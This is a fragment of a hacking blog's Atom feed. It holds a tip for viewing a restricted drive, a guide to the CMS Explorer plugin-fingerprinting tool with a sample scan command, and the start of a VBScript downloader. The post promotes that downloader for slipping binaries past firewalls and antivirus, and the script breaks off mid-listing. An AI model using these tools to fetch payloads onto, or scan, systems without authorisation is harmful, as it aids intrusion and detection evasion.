Moreover, if you don't have access to the C drive, or any other particular drive,  there are a few ways to view it's contents. You just need to be able to  install programs. Google has a program called "Google Desktop" which indexes the computer  and makes it searchable.&lt;br /&gt;
Or, you can download a web browser such as  Opera. In the url bar type this "file://" you should now see a list of drives.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;span style="color: black;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
Seems funny? Weel, actually it is. :)&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
Neways, this much fr now. Enjoy Hacking, enjoy hackplanet. ;) &amp;nbsp;:-@&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;br /&gt;
&lt;code&gt;&lt;span style="color: blue;"&gt;&lt;span style="color: black;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-4723714153749710519?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/4723714153749710519/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/09/diffrent-ways-to-access-command-prompt.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4723714153749710519?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4723714153749710519?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/09/diffrent-ways-to-access-command-prompt.html' title='Diffrent ways to Access Command Prompt'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;Ak8FRHs8fip7ImA9WhdVFE0.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-5056025655910604950</id><published>2011-09-11T00:14:00.000-07:00</published><updated>2011-09-18T22:06:55.576-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-09-18T22:06:55.576-07:00</app:edited><title>CMS Explorer : Reveal CMS Components out of the Site</title><content type='html'>&lt;span class="Apple-style-span" style="background-color: white; color: #4a4a4a; font-family: Tahoma; font-size: 11px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="chapo"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.angeldesigning.com/images/Full%20List%20Open%20Source%20CMS.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="color: black; font-family: 'Courier New', Courier, monospace;"&gt;&lt;img border="0" height="320" src="http://www.angeldesigning.com/images/Full%20List%20Open%20Source%20CMS.gif" width="315" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;strong class="spip"&gt;CMS Explorer&lt;/strong&gt;&amp;nbsp;is basically used to find out and thus reveal the different modules, plugins, components and themes a particular CMS based site is using.&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="chapo"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span"&gt;Moreover, CMS Explorer can be used as an effective tool in security testing. However it is not having any kind of specific thing&amp;nbsp;targeted&amp;nbsp;to Security Checks, but yeah, The "ExplorE" options can be used to find out the hidden or library files that can never be accessed by the normal web clients. The whole process includes retrieving the current source's&amp;nbsp;hierarchical&amp;nbsp;sturctur, followed by the request for fnding the file names from the target system. These requests are sent by some specific proxy and thus can be used any further in the tools like Web inspect, Burp, etc.&lt;/span&gt;&lt;span class="Apple-style-span"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="chapo"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;It currenty supprts module/theme discovery with the Drupal, Wordpress, Joomla, Mambo.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="texte"&gt;
&lt;ul class="spip"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;li class="spip" style="line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"&gt;Drupal and Wordpress can be explored further as well.&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;strong class="spip"&gt;&lt;u&gt;Options :&lt;/u&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;strong class="spip"&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="chapo"&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;This explorer&amp;nbsp;is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="texte"&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the&amp;nbsp;&lt;i class="spip"&gt;"explore"&lt;/i&gt;&amp;nbsp;option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module’s current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help&amp;nbsp;&lt;i class="spip"&gt;"bootstrap"&lt;/i&gt;&amp;nbsp;security testing tools like Burp, Paros, Webinspect, etc.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;CMS Explorer can also search&amp;nbsp;&lt;a class="spip_out" href="http://osvdb.org/" target="_blank"&gt;OSVDB&lt;/a&gt;&amp;nbsp;for vulnerabilities with the installed components.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;CMS Explorer currently supports module/theme discovery with the following products:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul class="spip"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;li class="spip" style="line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"&gt;Drupal&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"&gt;Wordpress&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"&gt;Joomla!&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-image: url(http://www.security-database.com/layout_images/images/a1.gif); list-style-position: outside;"&gt;Mambo&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;And exploration of the following products:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul class="spip"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;li class="spip" style="line-height: normal; list-style-position: outside;"&gt;Drupal&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-position: outside;"&gt;Wordpress&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;In order to install it, first of all Unpack the Archive, Then Create a file "osvdb.key in the CMS explorer directory, and the put the OSVDB key at the first line. :)&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="max-width: 62em; padding-left: 25px;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;You can also run " ./cms-explorer.pl" to ensure that no errors are coming.&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="texte"&gt;
&lt;div class="spip"&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;b&gt;&lt;u&gt;Usage :&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;In order to use CMS Explorer, You had to at least specify the url to "ROOT" of the CMS along with the type of that CMS. So, why ROOT? &amp;nbsp;basically ROOT is the base \URL of any kind of CMS. For an instance, root level of Wordpress are wp-content and wp-admin directories.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;In case you specify an incorrect root level, one which actually doesnot exists at all, CMS epxlorer would not stop :P. In fact it would keep running but however with no results.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;u&gt;&lt;b&gt;Options / Swicthes :&lt;/b&gt;&lt;/u&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="spip"&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;strong class="spip"&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="max-width: 62em; padding-left: 25px;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;bsproxy&lt;/strong&gt;&amp;nbsp;(requires value): The proxy to route any found files through. Format can be like '&lt;a href="http://host:port/" rel="nofollow"&gt;http://host:port/&lt;/a&gt;', 'host:port' or just 'host'. If port is not specified, the default is 80.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;explore&lt;/strong&gt;: Look for additional theme/plugin files. Only supported for Drupal and Wordpress.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;osvdb&lt;/strong&gt;: Check osvdb.org for vulnerabilities in the installed components. Requires an API key be in a file called osvdb.key.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;plugins&lt;/strong&gt;: Look for plugins/module/component files. By default this is enabled and both plugins and themes will be checked.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;pluginfile+&lt;/strong&gt;&amp;nbsp;(requires value): Alternative plugin file list.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;proxy+&lt;/strong&gt;&amp;nbsp;(requires value): Proxy for base requests. Format can be like '&lt;a href="http://host:port/" rel="nofollow"&gt;http://host:port/&lt;/a&gt;', 'host:port' or just 'host'. If port is not specified, the default is 80.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;themes&lt;/strong&gt;&amp;nbsp;(requires value): Look for themes. By default this is enabled and both plugins and themes will be checked.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;themefile+&lt;/strong&gt;&amp;nbsp;(requires value): Alternative theme file list.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;type+&lt;/strong&gt;&amp;nbsp;(required, requires value): The CMS type to be tested: Drupal, Wordpress, Joomla/Mambo.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;update&lt;/strong&gt;: Update the default lists from Wordpress and Drupal. This over-writes the current files with fresh copies.&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;url+&lt;/strong&gt;&amp;nbsp;(required, requires value): Full URL to application's root directory (where the CMS is installed)&lt;/li&gt;
&lt;li style="margin-bottom: 0.3em;"&gt;&lt;strong&gt;-verbosity+&lt;/strong&gt;&amp;nbsp;(requires value): 1-3 in increasing levels of output.&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 16px;"&gt;Test for Wordpress plugins and themes aga&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; line-height: 16px;"&gt;inst hackplanet.in, explore for additional files. Route all "found" items using the bootstrap proxy running on port 8080 of localhost.&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;blockquote style="margin-bottom: 20px; margin-left: 20px; margin-right: 20px; margin-top: 20px; max-width: 60em;"&gt;
&lt;tt style="max-width: 66em;"&gt;perl cms-explorer.pl -url http://hacklpanet.in/ -v 1 -bsproxy localhost:8080 -explore -type wordpress&lt;/tt&gt;&lt;/blockquote&gt;
&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;Port 8080 can be something else as well, so on the basis of scanning and your observations regarding the ports, give it as "localhost:portnumber" . :)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;By the way, lets be ready to have fun.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;img alt="" height="1" src="http://www.security-database.com/toolswatch/images/spacer.gif" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px;" width="1" /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace; font-size: large;"&gt;&lt;a href="http://code.google.com/p/cms-explorer/downloads/list"&gt;Download It Here :)&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;Other Required Things.&lt;/span&gt;&lt;/div&gt;
&lt;span class="Apple-style-span" style="background-color: white; font-family: 'Courier New', Courier, monospace;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;ul class="spip"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;

&lt;/span&gt;
&lt;li class="spip" style="line-height: normal; list-style-position: outside;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;Getopt::Basically a Long perl module&lt;/span&gt;&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-position: outside;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;LibWhisker (LW2) included, or Download from &amp;nbsp;&lt;a href="http://www.wiretrip.net/rfp/lw.asp"&gt;http://www.wiretrip.net/rfp/lw.asp&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li class="spip" style="line-height: normal; list-style-position: outside;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"&gt;OSVDB API Key (optional):&amp;nbsp;&lt;a href="http://osvdb.org/api/about"&gt;http://osvdb.org/api/about&lt;/a&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;/span&gt;&lt;/ul&gt;
&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;/div&gt;
&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-5056025655910604950?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/5056025655910604950/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/09/cms-explorer-reveal-cms-components-out.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5056025655910604950?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/5056025655910604950?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/09/cms-explorer-reveal-cms-components-out.html' title='CMS Explorer : Reveal CMS Components out of the Site'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D0cDQngyfip7ImA9WhdQEkk.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-6392272053159415277</id><published>2011-08-13T07:17:00.000-07:00</published><updated>2011-08-13T07:17:53.696-07:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-08-13T07:17:53.696-07:00</app:edited><title>Retreive External files Via HTTP using WHS Scritps</title><content type='html'>&lt;b&gt;Sorry guys for&amp;nbsp;being&amp;nbsp;this much late in writing this blog entry. Was busy with lot of stuffs in between and was feeling bad. Anyways, starting with WHS scripts, and would keep on writing abou more things which i had learnt in between these days.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;/b&gt;&lt;b&gt;Windows Script Host (WSH) is a scripting environment developed by Microsoft&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;for automation of tasks in the Windows operating system. It has been used extensively by&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Windows system and network administrators. WSH scripts have also been shipped by&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Microsoft as an integral part of various Windows operating systems and products such as&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;the IIS web server. In contrast to well-known hacking tools, text based WSH scripts are&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;less likely to be flagged by signature based virus scanners as malware—a desirable&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;attribute for an attacker trying to avoid detection.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;The following script utilizes the XMLHTTP COM object (Microsoft), which is&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;present on most Windows systems, to download files via the HTTP protocol. This can be&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;a useful tool to retrieve binaries since firewall rules usually permit inbound HTTP traffic.&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;' XmlHttpGetBinary.vbs&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;' This script invokes the XMLHTTP object to download the file specified&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;' in the URL passed on the command line and saves it to the specified&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;' file name.&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;dim XmlHttp, Args, StdOut, URL, FileName, AsynchRequest, OutputStream&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;const BINARY_STREAM_TYPE = 1&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;const CREATE_OVERWRITE_SAVE_MODE = 2&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set StdOut = WScript.StdOut&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set Args = WScript.Arguments&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;if Args.Count &amp;lt;&amp;gt; 2 then&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;StdOut.WriteLine "Usage: xmlhttpGetBinary &lt;url&gt; &lt;localfilename&gt;"&lt;/localfilename&gt;&lt;/url&gt;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;WScript.Quit&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;end if&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;URL = Args.Item(0)&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;FileName = Args.Item(1)&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP")&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;set OutputStream = WScript.CreateObject("ADODB.Stream")&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;AsynchRequest = false&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;XmlHttp.Open "GET", URL, AsynchRequest&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;br /&gt;
